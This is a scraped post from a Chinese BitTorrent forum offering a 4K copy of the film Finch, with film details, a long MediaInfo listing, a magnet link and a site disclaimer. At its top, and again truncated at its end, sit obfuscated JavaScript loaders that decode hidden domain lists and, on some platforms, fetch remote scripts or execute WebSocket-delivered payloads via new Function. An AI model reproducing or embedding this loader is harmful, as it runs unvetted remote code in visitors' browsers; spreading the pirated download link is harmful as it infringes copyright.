芬奇[中文字幕].Finch.2021.2160p.HDR.WEB-DL.DDP5.1.Atmos.HEVC 25.50GB

版主小s 28天前 510

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 芬奇 / 生化 / 人生 / BIOS / 芬奇的旅程

◎片 名 Finch

◎年 代 2021

◎产 地 英国 / 美国

◎类 别 剧情 / 科幻

◎语 言 英语

◎上映日期 2021-11-05(美国)

◎IMDb链接 https://www.imdb.com/title/tt3420504/

◎豆瓣链接 https://movie.douban.com/subject/26897885/

◎片 长 115分钟

◎导 演 米格尔·萨普什尼克 Miguel Sapochnik (id:1350650)

◎编 剧 克雷格·勒克 Craig Luck (id:1044399)

◎演 员 汤姆·汉克斯 Tom Hanks (id:1054450)

卡赖伯·兰德里·琼斯 Caleb Landry Jones (id:1235113)

洛拉·玛汀内斯-康宁安 Lora Martinez-Cunningham (id:1391559)

玛丽·瓦根曼 Marie Wagenman (id:1387543)

斯基特·乌尔里奇 Skeet Ulrich (id:1004631)

萨米拉·威利 Samira Wiley (id:1331705)

◎标 签 科幻 / 汤姆·汉克斯 / 美国 / 2021 / 美国电影 / Tom·Hanks / 电影 / 环球

◎简 介

汤姆·汉克斯将出演科幻新片《Bios》,《权力的游戏》《豪斯医生》导演Miguel Sapochnik执导,Craig Luck(《奇异博士》《碟中谍5》)和Ivor Powell(《异形》《银翼杀手》)操刀剧本。罗伯特·泽米吉斯、凯文·米舍担任制片人。设定在后世界末日的地球上,一位濒死的发明家打造了一个机器人,来保护他心爱的狗。在这一旅程中,机器人懂得了爱、友谊以及人类生活的意义。汉克斯将饰演发明家,预计2018年第一季度开拍。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 21383094346950721001502157142819704857 (0x10163BF29B7DE174407F8EACF5359019)

  4. Complete name : Finch.2021.2160p.HDR.ATVP.WEB-DL.D[email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 25.5 GiB

  8. Duration : 1 h 55 min

  9. Overall bit rate : 31.6 Mb/s

  10. Encoded date : UTC 2021-11-06 02:15:05

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. HDR format : SMPTE ST 2086, HDR10 compatible

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 55 min

  21. Bit rate : 23.9 Mb/s

  22. Width : 3 840 pixels

  23. Height : 1 608 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0 (Type 2)

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.161

  31. Stream size : 19.3 GiB (76%)

  32. Language : English

  33. Default : Yes

  34. Forced : No

  35. Color range : Limited

  36. Color primaries : BT.2020

  37. Transfer characteristics : PQ

  38. Matrix coefficients : BT.2020 non-constant

  39. Mastering display color primaries : Display P3

  40. Mastering display luminance : min: 0.0050 cd/m2, max: 1000 cd/m2

  41. Maximum Content Light Level : 3201 cd/m2

  42. Maximum Frame-Average Light Level : 386 cd/m2


  43. Audio #1

  44. ID : 2

  45. Format : E-AC-3 JOC

  46. Format/Info : Enhanced AC-3 with Joint Object Coding

  47. Commercial name : Dolby Digital Plus with Dolby Atmos

  48. Codec ID : A_EAC3

  49. Duration : 1 h 55 min

  50. Bit rate mode : Constant

  51. Bit rate : 768 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 31.250 FPS (1536 SPF)

  56. Compression mode : Lossy

  57. Stream size : 635 MiB (2%)

  58. Title : English

  59. Language : English

  60. Service kind : Complete Main

  61. Default : Yes

  62. Forced : No

  63. Complexity index : 16

  64. Number of dynamic objects : 15

  65. Bed channel count : 1 channel

  66. Bed channel configuration : LFE


  67. Audio #2

  68. ID : 3

  69. Format : E-AC-3 JOC

  70. Format/Info : Enhanced AC-3 with Joint Object Coding

  71. Commercial name : Dolby Digital Plus with Dolby Atmos

  72. Codec ID : A_EAC3

  73. Duration : 1 h 55 min

  74. Bit rate mode : Constant

  75. Bit rate : 768 kb/s

  76. Channel(s) : 6 channels

  77. Channel layout : L R C LFE Ls Rs

  78. Sampling rate : 48.0 kHz

  79. Frame rate : 31.250 FPS (1536 SPF)

  80. Compression mode : Lossy

  81. Stream size : 635 MiB (2%)

  82. Title : Fran?ais

  83. Language : French

  84. Service kind : Complete Main

  85. Default : No

  86. Forced : No

  87. Complexity index : 16

  88. Number of dynamic objects : 15

  89. Bed channel count : 1 channel

  90. Bed channel configuration : LFE


  91. Audio #3

  92. ID : 4

  93. Format : E-AC-3 JOC

  94. Format/Info : Enhanced AC-3 with Joint Object Coding

  95. Commercial name : Dolby Digital Plus with Dolby Atmos

  96. Codec ID : A_EAC3

  97. Duration : 1 h 55 min

  98. Bit rate mode : Constant

  99. Bit rate : 768 kb/s

  100. Channel(s) : 6 channels

  101. Channel layout : L R C LFE Ls Rs

  102. Sampling rate : 48.0 kHz

  103. Frame rate : 31.250 FPS (1536 SPF)

  104. Compression mode : Lossy

  105. Stream size : 635 MiB (2%)

  106. Title : Fran?ais

  107. Language : French

  108. Service kind : Complete Main

  109. Default : No

  110. Forced : No

  111. Complexity index : 16

  112. Number of dynamic objects : 15

  113. Bed channel count : 1 channel

  114. Bed channel configuration : LFE


  115. Audio #4

  116. ID : 5

  117. Format : E-AC-3 JOC

  118. Format/Info : Enhanced AC-3 with Joint Object Coding

  119. Commercial name : Dolby Digital Plus with Dolby Atmos

  120. Codec ID : A_EAC3

  121. Duration : 1 h 55 min

  122. Bit rate mode : Constant

  123. Bit rate : 768 kb/s

  124. Channel(s) : 6 channels

  125. Channel layout : L R C LFE Ls Rs

  126. Sampling rate : 48.0 kHz

  127. Frame rate : 31.250 FPS (1536 SPF)

  128. Compression mode : Lossy

  129. Stream size : 635 MiB (2%)

  130. Title : Deutsch

  131. Language : German

  132. Service kind : Complete Main

  133. Default : No

  134. Forced : No

  135. Complexity index : 16

  136. Number of dynamic objects : 15

  137. Bed channel count : 1 channel

  138. Bed channel configuration : LFE


  139. Audio #5

  140. ID : 6

  141. Format : E-AC-3 JOC

  142. Format/Info : Enhanced AC-3 with Joint Object Coding

  143. Commercial name : Dolby Digital Plus with Dolby Atmos

  144. Codec ID : A_EAC3

  145. Duration : 1 h 55 min

  146. Bit rate mode : Constant

  147. Bit rate : 768 kb/s

  148. Channel(s) : 6 channels

  149. Channel layout : L R C LFE Ls Rs

  150. Sampling rate : 48.0 kHz

  151. Frame rate : 31.250 FPS (1536 SPF)

  152. Compression mode : Lossy

  153. Stream size : 635 MiB (2%)

  154. Title : Italiano

  155. Language : Italian

  156. Service kind : Complete Main

  157. Default : No

  158. Forced : No

  159. Complexity index : 16

  160. Number of dynamic objects : 15

  161. Bed channel count : 1 channel

  162. Bed channel configuration : LFE


  163. Audio #6

  164. ID : 7

  165. Format : E-AC-3 JOC

  166. Format/Info : Enhanced AC-3 with Joint Object Coding

  167. Commercial name : Dolby Digital Plus with Dolby Atmos

  168. Codec ID : A_EAC3

  169. Duration : 1 h 55 min

  170. Bit rate mode : Constant

  171. Bit rate : 768 kb/s

  172. Channel(s) : 6 channels

  173. Channel layout : L R C LFE Ls Rs

  174. Sampling rate : 48.0 kHz

  175. Frame rate : 31.250 FPS (1536 SPF)

  176. Compression mode : Lossy

  177. Stream size : 635 MiB (2%)

  178. Title : 日本語

  179. Language : Japanese

  180. Service kind : Complete Main

  181. Default : No

  182. Forced : No

  183. Complexity index : 16

  184. Number of dynamic objects : 15

  185. Bed channel count : 1 channel

  186. Bed channel configuration : LFE


  187. Audio #7

  188. ID : 8

  189. Format : E-AC-3 JOC

  190. Format/Info : Enhanced AC-3 with Joint Object Coding

  191. Commercial name : Dolby Digital Plus with Dolby Atmos

  192. Codec ID : A_EAC3

  193. Duration : 1 h 55 min

  194. Bit rate mode : Constant

  195. Bit rate : 768 kb/s

  196. Channel(s) : 6 channels

  197. Channel layout : L R C LFE Ls Rs

  198. Sampling rate : 48.0 kHz

  199. Frame rate : 31.250 FPS (1536 SPF)

  200. Compression mode : Lossy

  201. Stream size : 635 MiB (2%)

  202. Title : Português

  203. Language : Portuguese

  204. Service kind : Complete Main

  205. Default : No

  206. Forced : No

  207. Complexity index : 16

  208. Number of dynamic objects : 15

  209. Bed channel count : 1 channel

  210. Bed channel configuration : LFE


  211. Audio #8

  212. ID : 9

  213. Format : E-AC-3 JOC

  214. Format/Info : Enhanced AC-3 with Joint Object Coding

  215. Commercial name : Dolby Digital Plus with Dolby Atmos

  216. Codec ID : A_EAC3

  217. Duration : 1 h 55 min

  218. Bit rate mode : Constant

  219. Bit rate : 768 kb/s

  220. Channel(s) : 6 channels

  221. Channel layout : L R C LFE Ls Rs

  222. Sampling rate : 48.0 kHz

  223. Frame rate : 31.250 FPS (1536 SPF)

  224. Compression mode : Lossy

  225. Stream size : 635 MiB (2%)

  226. Title : русский язык

  227. Language : Russian

  228. Service kind : Complete Main

  229. Default : No

  230. Forced : No

  231. Complexity index : 16

  232. Number of dynamic objects : 15

  233. Bed channel count : 1 channel

  234. Bed channel configuration : LFE


  235. Audio #9

  236. ID : 10

  237. Format : E-AC-3 JOC

  238. Format/Info : Enhanced AC-3 with Joint Object Coding

  239. Commercial name : Dolby Digital Plus with Dolby Atmos

  240. Codec ID : A_EAC3

  241. Duration : 1 h 55 min

  242. Bit rate mode : Constant

  243. Bit rate : 768 kb/s

  244. Channel(s) : 6 channels

  245. Channel layout : L R C LFE Ls Rs

  246. Sampling rate : 48.0 kHz

  247. Frame rate : 31.250 FPS (1536 SPF)

  248. Compression mode : Lossy

  249. Stream size : 635 MiB (2%)

  250. Title : Espa?ol?(Latinoamérica)

  251. Language : Spanish

  252. Service kind : Complete Main

  253. Default : No

  254. Forced : No

  255. Complexity index : 16

  256. Number of dynamic objects : 15

  257. Bed channel count : 1 channel

  258. Bed channel configuration : LFE


  259. Audio #10

  260. ID : 11

  261. Format : E-AC-3 JOC

  262. Format/Info : Enhanced AC-3 with Joint Object Coding

  263. Commercial name : Dolby Digital Plus with Dolby Atmos

  264. Codec ID : A_EAC3

  265. Duration : 1 h 55 min

  266. Bit rate mode : Constant

  267. Bit rate : 768 kb/s

  268. Channel(s) : 6 channels

  269. Channel layout : L R C LFE Ls Rs

  270. Sampling rate : 48.0 kHz

  271. Frame rate : 31.250 FPS (1536 SPF)

  272. Compression mode : Lossy

  273. Stream size : 635 MiB (2%)

  274. Title : Espa?ol?(Espa?a)

  275. Language : Spanish

  276. Service kind : Complete Main

  277. Default : No

  278. Forced : No

  279. Complexity index : 16

  280. Number of dynamic objects : 15

  281. Bed channel count : 1 channel

  282. Bed channel configuration : LFE


  283. Text #1

  284. ID : 12

  285. Format : UTF-8

  286. Codec ID : S_TEXT/UTF8

  287. Codec ID/Info : UTF-8 Plain Text

  288. Duration : 1 h 47 min

  289. Bit rate : 36 b/s

  290. Count of elements : 1028

  291. Stream size : 29.0 KiB (0%)

  292. Title : English

  293. Language : English

  294. Default : Yes

  295. Forced : No


  296. Text #2

  297. ID : 13

  298. Format : UTF-8

  299. Codec ID : S_TEXT/UTF8

  300. Codec ID/Info : UTF-8 Plain Text

  301. Duration : 1 h 55 min

  302. Bit rate : 53 b/s

  303. Count of elements : 1084

  304. Stream size : 45.2 KiB (0%)

  305. Title : ????

  306. Language : Arabic

  307. Default : No

  308. Forced : No


  309. Text #3

  310. ID : 14

  311. Format : UTF-8

  312. Codec ID : S_TEXT/UTF8

  313. Codec ID/Info : UTF-8 Plain Text

  314. Duration : 1 h 55 min

  315. Bit rate : 52 b/s

  316. Count of elements : 1064

  317. Stream size : 44.7 KiB (0%)

  318. Title : български

  319. Language : Bulgarian

  320. Default : No

  321. Forced : No


  322. Text #4

  323. ID : 15

  324. Format : UTF-8

  325. Codec ID : S_TEXT/UTF8

  326. Codec ID/Info : UTF-8 Plain Text

  327. Duration : 1 h 55 min

  328. Bit rate : 33 b/s

  329. Count of elements : 1042

  330. Stream size : 28.5 KiB (0%)

  331. Title : ?esky

  332. Language : Czech

  333. Default : No

  334. Forced : No


  335. Text #5

  336. ID : 16

  337. Format : UTF-8

  338. Codec ID : S_TEXT/UTF8

  339. Codec ID/Info : UTF-8 Plain Text

  340. Duration : 1 h 55 min

  341. Bit rate : 32 b/s

  342. Count of elements : 900

  343. Stream size : 27.6 KiB (0%)

  344. Title : dansk

  345. Language : Danish

  346. Default : No

  347. Forced : No


  348. Text #6

  349. ID : 17

  350. Format : UTF-8

  351. Codec ID : S_TEXT/UTF8

  352. Codec ID/Info : UTF-8 Plain Text

  353. Duration : 1 h 55 min

  354. Bit rate : 33 b/s

  355. Count of elements : 1038

  356. Stream size : 28.1 KiB (0%)

  357. Title : Nederlands

  358. Language : Dutch

  359. Default : No

  360. Forced : No


  361. Text #7

  362. ID : 18

  363. Format : UTF-8

  364. Codec ID : S_TEXT/UTF8

  365. Codec ID/Info : UTF-8 Plain Text

  366. Duration : 1 h 55 min

  367. Bit rate : 34 b/s

  368. Count of elements : 1027

  369. Stream size : 29.0 KiB (0%)

  370. Title : eesti keel

  371. Language : Estonian

  372. Default : No

  373. Forced : No


  374. Text #8

  375. ID : 19

  376. Format : UTF-8

  377. Codec ID : S_TEXT/UTF8

  378. Codec ID/Info : UTF-8 Plain Text

  379. Duration : 1 h 55 min

  380. Bit rate : 33 b/s

  381. Count of elements : 1043

  382. Stream size : 28.6 KiB (0%)

  383. Title : Vlaams

  384. Language : Finnish

  385. Default : No

  386. Forced : No


  387. Text #9

  388. ID : 20

  389. Format : UTF-8

  390. Codec ID : S_TEXT/UTF8

  391. Codec ID/Info : UTF-8 Plain Text

  392. Duration : 1 h 49 min

  393. Bit rate : 37 b/s

  394. Count of elements : 1200

  395. Stream size : 30.5 KiB (0%)

  396. Title : Fran?ais

  397. Language : French

  398. Default : No

  399. Forced : No


  400. Text #10

  401. ID : 21

  402. Format : UTF-8

  403. Codec ID : S_TEXT/UTF8

  404. Codec ID/Info : UTF-8 Plain Text

  405. Duration : 1 h 49 min

  406. Bit rate : 37 b/s

  407. Count of elements : 1201

  408. Stream size : 30.5 KiB (0%)

  409. Title : Fran?ais

  410. Language : French

  411. Default : No

  412. Forced : No


  413. Text #11

  414. ID : 22

  415. Format : UTF-8

  416. Codec ID : S_TEXT/UTF8

  417. Codec ID/Info : UTF-8 Plain Text

  418. Duration : 1 h 49 min

  419. Bit rate : 37 b/s

  420. Count of elements : 1201

  421. Stream size : 30.5 KiB (0%)

  422. Title : Fran?ais

  423. Language : French

  424. Default : No

  425. Forced : No


  426. Text #12

  427. ID : 23

  428. Format : UTF-8

  429. Codec ID : S_TEXT/UTF8

  430. Codec ID/Info : UTF-8 Plain Text

  431. Duration : 1 h 49 min

  432. Bit rate : 41 b/s

  433. Count of elements : 1086

  434. Stream size : 33.2 KiB (0%)

  435. Title : Deutsch

  436. Language : German

  437. Default : No

  438. Forced : No


  439. Text #13

  440. ID : 24

  441. Format : UTF-8

  442. Codec ID : S_TEXT/UTF8

  443. Codec ID/Info : UTF-8 Plain Text

  444. Duration : 1 h 55 min

  445. Bit rate : 59 b/s

  446. Count of elements : 1067

  447. Stream size : 50.2 KiB (0%)

  448. Title : ελληνικ?

  449. Language : Greek

  450. Default : No

  451. Forced : No


  452. Text #14

  453. ID : 25

  454. Format : UTF-8

  455. Codec ID : S_TEXT/UTF8

  456. Codec ID/Info : UTF-8 Plain Text

  457. Duration : 1 h 55 min

  458. Bit rate : 47 b/s

  459. Count of elements : 1085

  460. Stream size : 40.1 KiB (0%)

  461. Title : ????

  462. Language : Hebrew

  463. Default : No

  464. Forced : No


  465. Text #15

  466. ID : 26

  467. Format : UTF-8

  468. Codec ID : S_TEXT/UTF8

  469. Codec ID/Info : UTF-8 Plain Text

  470. Duration : 1 h 55 min

  471. Bit rate : 97 b/s

  472. Count of elements : 1088

  473. Stream size : 82.4 KiB (0%)

  474. Title : ??????

  475. Language : Hindi

  476. Default : No

  477. Forced : No


  478. Text #16

  479. ID : 27

  480. Format : UTF-8

  481. Codec ID : S_TEXT/UTF8

  482. Codec ID/Info : UTF-8 Plain Text

  483. Duration : 1 h 55 min

  484. Bit rate : 33 b/s

  485. Count of elements : 1068

  486. Stream size : 28.6 KiB (0%)

  487. Title : Magyar

  488. Language : Hungarian

  489. Default : No

  490. Forced : No


  491. Text #17

  492. ID : 28

  493. Format : UTF-8

  494. Codec ID : S_TEXT/UTF8

  495. Codec ID/Info : UTF-8 Plain Text

  496. Duration : 1 h 55 min

  497. Bit rate : 34 b/s

  498. Count of elements : 1068

  499. Stream size : 28.9 KiB (0%)

  500. Title : Indonesia

  501. Language : Indonesian

  502. Default : No

  503. Forced : No


  504. Text #18

  505. ID : 29

  506. Format : UTF-8

  507. Codec ID : S_TEXT/UTF8

  508. Codec ID/Info : UTF-8 Plain Text

  509. Duration : 1 h 49 min

  510. Bit rate : 42 b/s

  511. Count of elements : 1070

  512. Stream size : 34.2 KiB (0%)

  513. Title : Italiano

  514. Language : Italian

  515. Default : No

  516. Forced : No


  517. Text #19

  518. ID : 30

  519. Format : UTF-8

  520. Codec ID : S_TEXT/UTF8

  521. Codec ID/Info : UTF-8 Plain Text

  522. Duration : 1 h 55 min

  523. Bit rate : 36 b/s

  524. Count of elements : 1006

  525. Stream size : 30.7 KiB (0%)

  526. Title : 日本語

  527. Language : Japanese

  528. Default : No

  529. Forced : No


  530. Text #20

  531. ID : 31

  532. Format : UTF-8

  533. Codec ID : S_TEXT/UTF8

  534. Codec ID/Info : UTF-8 Plain Text

  535. Duration : 1 h 55 min

  536. Bit rate : 38 b/s

  537. Count of elements : 1087

  538. Stream size : 32.6 KiB (0%)

  539. Title : ???

  540. Language : Korean

  541. Default : No

  542. Forced : No


  543. Text #21

  544. ID : 32

  545. Format : UTF-8

  546. Codec ID : S_TEXT/UTF8

  547. Codec ID/Info : UTF-8 Plain Text

  548. Duration : 1 h 55 min

  549. Bit rate : 35 b/s

  550. Count of elements : 1055

  551. Stream size : 29.6 KiB (0%)

  552. Title : lietuvi? kalba

  553. Language : Lithuanian

  554. Default : No

  555. Forced : No


  556. Text #22

  557. ID : 33

  558. Format : UTF-8

  559. Codec ID : S_TEXT/UTF8

  560. Codec ID/Info : UTF-8 Plain Text

  561. Duration : 1 h 55 min

  562. Bit rate : 36 b/s

  563. Count of elements : 1078

  564. Stream size : 31.2 KiB (0%)

  565. Title : latvie?u valoda

  566. Language : Latvian

  567. Default : No

  568. Forced : No


  569. Text #23

  570. ID : 34

  571. Format : UTF-8

  572. Codec ID : S_TEXT/UTF8

  573. Codec ID/Info : UTF-8 Plain Text

  574. Duration : 1 h 55 min

  575. Bit rate : 34 b/s

  576. Count of elements : 1070

  577. Stream size : 29.5 KiB (0%)

  578. Title : ???? ?????

  579. Language : Malay

  580. Default : No

  581. Forced : No


  582. Text #24

  583. ID : 35

  584. Format : UTF-8

  585. Codec ID : S_TEXT/UTF8

  586. Codec ID/Info : UTF-8 Plain Text

  587. Duration : 1 h 55 min

  588. Bit rate : 30 b/s

  589. Count of elements : 1085

  590. Stream size : 25.8 KiB (0%)

  591. Title : 中文(简体)

  592. Language : Chinese

  593. Default : No

  594. Forced : No


  595. Text #25

  596. ID : 36

  597. Format : UTF-8

  598. Codec ID : S_TEXT/UTF8

  599. Codec ID/Info : UTF-8 Plain Text

  600. Duration : 1 h 55 min

  601. Bit rate : 31 b/s

  602. Count of elements : 1088

  603. Stream size : 26.9 KiB (0%)

  604. Title : 中文(繁體)

  605. Language : Chinese

  606. Default : No

  607. Forced : No


  608. Text #26

  609. ID : 37

  610. Format : UTF-8

  611. Codec ID : S_TEXT/UTF8

  612. Codec ID/Info : UTF-8 Plain Text

  613. Duration : 1 h 55 min

  614. Bit rate : 32 b/s

  615. Count of elements : 1088

  616. Stream size : 27.5 KiB (0%)

  617. Title : 中文(粤语)

  618. Language : Chinese

  619. Default : No

  620. Forced : No


  621. Text #27

  622. ID : 38

  623. Format : UTF-8

  624. Codec ID : S_TEXT/UTF8

  625. Codec ID/Info : UTF-8 Plain Text

  626. Duration : 1 h 55 min

  627. Bit rate : 33 b/s

  628. Count of elements : 1035

  629. Stream size : 28.0 KiB (0%)

  630. Title : norsk

  631. Language : Norwegian

  632. Default : No

  633. Forced : No


  634. Text #28

  635. ID : 39

  636. Format : UTF-8

  637. Codec ID : S_TEXT/UTF8

  638. Codec ID/Info : UTF-8 Plain Text

  639. Duration : 1 h 55 min

  640. Bit rate : 33 b/s

  641. Count of elements : 1043

  642. Stream size : 28.6 KiB (0%)

  643. Title : J?zyk polski

  644. Language : Polish

  645. Default : No

  646. Forced : No


  647. Text #29

  648. ID : 40

  649. Format : UTF-8

  650. Codec ID : S_TEXT/UTF8

  651. Codec ID/Info : UTF-8 Plain Text

  652. Duration : 1 h 55 min

  653. Bit rate : 35 b/s

  654. Count of elements : 1067

  655. Stream size : 30.0 KiB (0%)

  656. Title : Português

  657. Language : Portuguese

  658. Default : No

  659. Forced : No


  660. Text #30

  661. ID : 41

  662. Format : UTF-8

  663. Codec ID : S_TEXT/UTF8

  664. Codec ID/Info : UTF-8 Plain Text

  665. Duration : 1 h 55 min

  666. Bit rate : 34 b/s

  667. Count of elements : 1066

  668. Stream size : 28.9 KiB (0%)

  669. Title : Português

  670. Language : Portuguese

  671. Default : No

  672. Forced : No


  673. Text #31

  674. ID : 42

  675. Format : UTF-8

  676. Codec ID : S_TEXT/UTF8

  677. Codec ID/Info : UTF-8 Plain Text

  678. Duration : 1 h 55 min

  679. Bit rate : 56 b/s

  680. Count of elements : 1092

  681. Stream size : 47.9 KiB (0%)

  682. Title : русский язык

  683. Language : Russian

  684. Default : No

  685. Forced : No


  686. Text #32

  687. ID : 43

  688. Format : UTF-8

  689. Codec ID : S_TEXT/UTF8

  690. Codec ID/Info : UTF-8 Plain Text

  691. Duration : 1 h 55 min

  692. Bit rate : 34 b/s

  693. Count of elements : 1070

  694. Stream size : 28.9 KiB (0%)

  695. Title : sloven?ina

  696. Language : Slovak

  697. Default : No

  698. Forced : No


  699. Text #33

  700. ID : 44

  701. Format : UTF-8

  702. Codec ID : S_TEXT/UTF8

  703. Codec ID/Info : UTF-8 Plain Text

  704. Duration : 1 h 55 min

  705. Bit rate : 30 b/s

  706. Count of elements : 1032

  707. Stream size : 25.8 KiB (0%)

  708. Title : sloven??ina

  709. Language : Slovenian

  710. Default : No

  711. Forced : No


  712. Text #34

  713. ID : 45

  714. Format : UTF-8

  715. Codec ID : S_TEXT/UTF8

  716. Codec ID/Info : UTF-8 Plain Text

  717. Duration : 1 h 55 min

  718. Bit rate : 35 b/s

  719. Count of elements : 1055

  720. Stream size : 29.8 KiB (0%)

  721. Title : Espa?ol?(Latinoamérica)

  722. Language : Spanish

  723. Default : No

  724. Forced : No


  725. Text #35

  726. ID : 46

  727. Format : UTF-8

  728. Codec ID : S_TEXT/UTF8

  729. Codec ID/Info : UTF-8 Plain Text

  730. Duration : 1 h 55 min

  731. Bit rate : 37 b/s

  732. Count of elements : 1046

  733. Stream size : 31.9 KiB (0%)

  734. Title : Espa?ol?(Espa?a)

  735. Language : Spanish

  736. Default : No

  737. Forced : No


  738. Text #36

  739. ID : 47

  740. Format : UTF-8

  741. Codec ID : S_TEXT/UTF8

  742. Codec ID/Info : UTF-8 Plain Text

  743. Duration : 1 h 55 min

  744. Bit rate : 36 b/s

  745. Count of elements : 984

  746. Stream size : 30.8 KiB (0%)

  747. Title : svenska

  748. Language : Swedish

  749. Default : No

  750. Forced : No


  751. Text #37

  752. ID : 48

  753. Format : UTF-8

  754. Codec ID : S_TEXT/UTF8

  755. Codec ID/Info : UTF-8 Plain Text

  756. Duration : 1 h 55 min

  757. Bit rate : 111 b/s

  758. Count of elements : 1085

  759. Stream size : 94.3 KiB (0%)

  760. Title : ?????

  761. Language : Tamil

  762. Default : No

  763. Forced : No


  764. Text #38

  765. ID : 49

  766. Format : UTF-8

  767. Codec ID : S_TEXT/UTF8

  768. Codec ID/Info : UTF-8 Plain Text

  769. Duration : 1 h 55 min

  770. Bit rate : 94 b/s

  771. Count of elements : 1085

  772. Stream size : 79.7 KiB (0%)

  773. Title : ??????

  774. Language : Telugu

  775. Default : No

  776. Forced : No


  777. Text #39

  778. ID : 50

  779. Format : UTF-8

  780. Codec ID : S_TEXT/UTF8

  781. Codec ID/Info : UTF-8 Plain Text

  782. Duration : 1 h 55 min

  783. Bit rate : 76 b/s

  784. Count of elements : 1085

  785. Stream size : 64.6 KiB (0%)

  786. Title : ???

  787. Language : Thai

  788. Default : No

  789. Forced : No


  790. Text #40

  791. ID : 51

  792. Format : UTF-8

  793. Codec ID : S_TEXT/UTF8

  794. Codec ID/Info : UTF-8 Plain Text

  795. Duration : 1 h 55 min

  796. Bit rate : 36 b/s

  797. Count of elements : 1066

  798. Stream size : 30.7 KiB (0%)

  799. Title : Türk

  800. Language : Turkish

  801. Default : No

  802. Forced : No


  803. Text #41

  804. ID : 52

  805. Format : UTF-8

  806. Codec ID : S_TEXT/UTF8

  807. Codec ID/Info : UTF-8 Plain Text

  808. Duration : 1 h 55 min

  809. Bit rate : 54 b/s

  810. Count of elements : 1084

  811. Stream size : 46.0 KiB (0%)

  812. Title : Укра?нська

  813. Language : Ukrainian

  814. Default : No

  815. Forced : No


  816. Text #42

  817. ID : 53

  818. Format : UTF-8

  819. Codec ID : S_TEXT/UTF8

  820. Codec ID/Info : UTF-8 Plain Text

  821. Duration : 1 h 55 min

  822. Bit rate : 44 b/s

  823. Count of elements : 1069

  824. Stream size : 37.3 KiB (0%)

  825. Title : Ti?ng Vi?t

  826. Language : Vietnamese

  827. Default : No

  828. Forced : No




复制代码


TAGS 剧情 科幻

磁力链:
  • magnet:?xt=urn:btih:27CEE98B1830C66BB6889B242CDDAB550B08AF07

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var 